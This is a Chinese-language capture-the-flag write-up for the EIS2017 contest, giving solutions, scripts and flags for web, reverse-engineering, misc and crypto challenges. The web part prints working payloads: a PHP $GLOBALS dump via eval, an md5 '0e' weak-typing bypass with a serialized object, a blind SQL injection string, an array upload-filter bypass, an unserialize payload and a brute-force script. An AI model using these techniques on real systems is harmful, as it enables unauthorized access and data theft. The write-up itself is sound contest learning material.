EIS2017 CTF writeup
Web
简单的代码审计
源码:
<?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
paylaod:
/index.php?args=GLOBALS结果:
array(7) { ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["TheHiDdenfl4g"]=> string(25) "EIS{GE7_fl4g_w17h_GL0B4L}" ["args"]=> string(7) "GLOBALS" ["GLOBALS"]=> *RECURSION* }
快速计算
脚本如下:
import requests
url="http://202.120.7.220:2333/"
r=requests.get(url)
b=str(r.content).split('<br/>')[1].split('=<input type="text" name="v"/>')[0]
r=requests.post(url,data={'v':eval(b)})
print(r.text)
不是管理员也能Login
发现源码:
$test=$_GET['userid']; $test=md5($test);
if($test != '0'){
$this->error('用户名有误,请阅读说明与帮助!');
}
$pwd =$this->_post("password");
$data_u = unserialize($pwd);
if($data_u['name'] == 'XX' && $data_u['pwd']=='XX')
{
print_r($flag);
}首先绕过md5。百度寻找MD5为0e开头即可。然后再利用php弱类型。TRUE==任意字符串。
最终payload
getdata:?userid=s878926199a
postdata:userid=s878926199a&password=a:2:{s:4:"name";b:1;s:3:"pwd";b:1;}
phptrick
http://202.120.7.221:2333/index.php?gift=a&flag=php://input
post:a 然后kaisa密钥13
EIS{jbfuvsynt}
随机数
首先,分析题目。没有任何入手点,猜测为爆破随机数。
然后记录了一下出现的随机数。写成脚本如下。
import requests
import threading
url="http://202.112.26.124:8080/280a31eec4c62a893ad40a6508d207c8/index.php"
def main(code):
PHPSESSID=requests.get(url).headers['Set-Cookie'].split(';')[0]
header={'cookie':PHPSESSID}
while(1):
urla=url+'?code='+str(code)
try:
r=requests.get(urla,headers=header)
if('wrong answer' not in r.text):
print(r.text)
except:
pass
k=[278,332,653,841,394,783,210,153,93,334,749,179,841,394,783,188,299,537,724,612,27,334,749,179,188,299,537,119,913,605]
t=[]
print("loading....")
for i in k:
t1 = threading.Thread(target=main, args=(str(i),))
t.append(t1)
for th in t:
th.start()最终 getflag。
Login
盲注
exp: data="uname=admin'^(ascii(right(pwd,1))=100)^'1&pwd=admin"
脚本跑出来结果:fsaoaigafsdfsdubbwouibiaewrawe
登录得到flag:EIS{SQLI_INJECTIion_blind}
文件上传
无语的题,常识各种姿势都不能绕过"<",试试数组发现得到flag:
exp:ext=php&content[]=a<aa&content[]=ssss
flag:EIS{6yp455_with_4rr4y}
PHP是最好的语言
和以前做过的原题类似,绕过+反序列化,构造请求参数:
?foo=a:2:{s:6:"param1";s:7:"2018aaa";s:6:"param2";a:5:{i:0;a:1:{i:0;i:1;}i:1;i:2;i:2;i:2;i:3;i:3;i:4;i:0;}}&egg[0]=%00MyAns&egg[1][]=nnnn&finish=1
得到flag:EIS{php_th3_b45t_l4ngu4g3}
RE
reverseme
import logging
logging.getLogger('angr.surveyor').setLevel(logging.DEBUG)
import angr
def main():
p = angr.Project("ReverseMe.exe")
state = p.factory.blank_state(addr=0x004012E0 )
state.stack_push(0xd0000010) # pointer to argv[1]
state.stack_push(0xd0000000) # pointer to argv[0]
state.stack_push(state.regs.esp) # argv
state.stack_push(2) # argc
state.stack_push(0x401f30) # address of main
sm = p.factory.simgr(state)
print "123"
ex = sm.explore(find=0x00403D99, avoid=(0x00403DCF,0x00403E12,0x00403E01))
if len(ex.found)>0:
print "yes you got it"
found=ex.found[0]
print found.posix.dumps(0)
print found.posix.dumps(1)
#flag = s.se.eval(s.memory.load(flag_addr, 8), cast_to=str)
#flag22 = s.se.eval(s.memory.load(flag2, 8), cast_to=str)
# The flag is 'Math is hard!'
#print("The flag is '{0}'".format(flag))
#print("The flag is '{0}'".format(flag22))
return
if __name__ == "__main__":
main()
#EIS{wadx_tdgk_aihc_ihkn_pjlm}IgniteMe:
aa='GONDPHyGjPEKruv{{pj]X@rF'
bb=[0x0D,0x13,0x17,0x11,0x02,0x01,0x20,0x1D,0x0C,0x02,0x19,0x2F,0x17,0x2B,0x24,0x1F,0x1E,0x16,0x09,0x0F,0x15,0x27,0x13,0x26,0x0A,0x2F,0x1E,0x1A,0x2D,0x0C,0x22,0x04]
cc=[]
dd=''
print len(bb)
for i in range(len(aa)):
cc.append(ord(aa[i])^bb[i])
cc[i]-=72
cc[i]^=0x55
if (cc[i]>=0x41) and (cc[i]<=0x5a):
cc[i]+=0x20
elif (cc[i]>=0x61) and (cc[i]<=0x7a):
cc[i]-=0x20
dd+=chr(cc[i])
print dd
#EIS{wadx_tdgk_aihc_ihkn_pjlm}mobile
jeb不能反编译,直接ida,分析后发现关键函数final_check
分别打开两个so文件,定位final_check函数
MISC
隐藏在黑夜里的秘密
stegsolve打开bmp即可
DNS101
dns 服务器信息泄露
根据服务器信息可以陆续得到以下信息:
n.flag.src.edu-info.edu.cn.
z.flag.src.edu-info.edu.cn.
zz.flag.src.edu-info.edu.cn.
zzz.flag.src.edu-info.edu.cn.
.
.
.
zlar4eslumoafroa8piucrlawouy4est.zzzzzzz.flag.src.edu-info.edu.cn
dig flag-id-ztfrneclyudrfq3e6endq5.zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zzzzzzz.flag.src.edu-info.edu.cn ANY
easy crypto
查看加密脚本,原题。RC4加密而已。
# -*- coding: utf-8 -*-
def rc4(data,key):
j=0
s=range(256)
for i in range(256):
j=(j+s[i]+ord(key[i%len(key)]))%256
s[i],s[j]=s[j],s[i]
i=0
j=0
out=[]
for char in data:
i=(i+1)%256
j=(j+s[i])%256
s[i],s[j]=s[j],s[i]
out.append(chr(ord(char)^s[(s[i]+s[j])%256]))
return ''.join(out)
encodedata=rc4('\xca\xee\x86\x30\x48\xc4\xec\x56\x3d\x22\x2a\xbc\x9a\x95\x70\x23\x39\x76\x3b\xee\x09\x29\x2b\x01\x54\x00\x87\x5e\x37\x23\x3e\x79\x8b\x7b\xa9\x20\x78','hello world')
print encodedata
EIS{55a0a84f86a6ad40006f014619577ad3}腾讯云开发者
